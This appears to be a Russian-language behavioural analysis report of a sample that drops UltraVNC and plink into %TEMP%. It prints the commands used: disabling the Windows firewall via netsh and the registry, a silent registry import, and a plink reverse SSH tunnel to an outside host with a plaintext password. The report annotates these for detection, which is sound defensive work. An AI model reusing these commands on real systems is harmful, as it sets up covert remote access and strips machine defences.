Техническая информация
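Параметры брандмауэра Windows в реестре ('EnableFirewall' = 0 — брандмауэр для стандартного профиля отключён; 'DoNotAllowExceptions' = 0 — исключения разрешены):
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'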
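- %TEMP%\plink.exe -batch -l vnc -pw R3v3rse-R3m0te! -R 5902:127.0.0.1:5902 -N vnc.ict4schools.nl
  (plink запускается без интерактивных запросов (-batch) и без удалённой оболочки (-N); параметр -R 5902:127.0.0.1:5902 создаёт обратный SSH-туннель: порт 5902 на стороне SSH-сервера перенаправляется на локальный порт 5902, на котором, по-видимому, принимает подключения winvnc.exe. Имя пользователя и пароль переданы в командной строке открытым текстом, поэтому они попадают в журналы создания процессов; запуск plink с параметром -R из %TEMP% — удобный признак для обнаружения.)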
- %TEMP%\winvnc.exe -run
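- %WINDIR%\regedit.exe /S putty-keycache.reg
  (ключ /S — импорт .reg-файла без запроса подтверждения; судя по имени файла, в реестр заносится кэш ключей узлов PuTTY, чтобы plink в режиме -batch не прерывался на проверке неизвестного ключа сервера — это предположение, содержимое файла на странице не приведено.)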
- <SYSTEM32>\netsh.exe firewall set opmode disable
  (команда отключает брандмауэр Windows.)
- <SYSTEM32>\cmd.exe /c ""%TEMP%\run.bat" "
- %TEMP%\ldapauth9x.dll
- %TEMP%\ldapauthnt4.dll
- %TEMP%\ldapauth.dll
- %TEMP%\authadmin.dll
- %TEMP%\authSSP.dll
- %TEMP%\logging.dll
- %TEMP%\workgrpdomnt4.dll
- <LS_APPDATA>\PUTTY.RND
- %TEMP%\vnchooks.dll
- %TEMP%\logmessages.dll
- %TEMP%\sas.dll
- %TEMP%\MSLogonACL.exe
- %TEMP%\plink.exe
- %TEMP%\ultravnc.ini
- %TEMP%\run.bat
- %TEMP%\putty-keycache.reg
- %TEMP%\putty.exe
- %TEMP%\uvnc_settings.exe
- %TEMP%\winvnc.exe
- %TEMP%\testauth.exe
- %TEMP%\setcad.exe
- %TEMP%\setpasswd.exe
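- 'vn#.##t4schools.nl':22
- DNS ASK vn#.##t4schools.nl
  (порт 22 — стандартный порт SSH; замаскированное имя узла по шаблону совпадает с узлом, указанным в командной строке plink.exe.)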
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''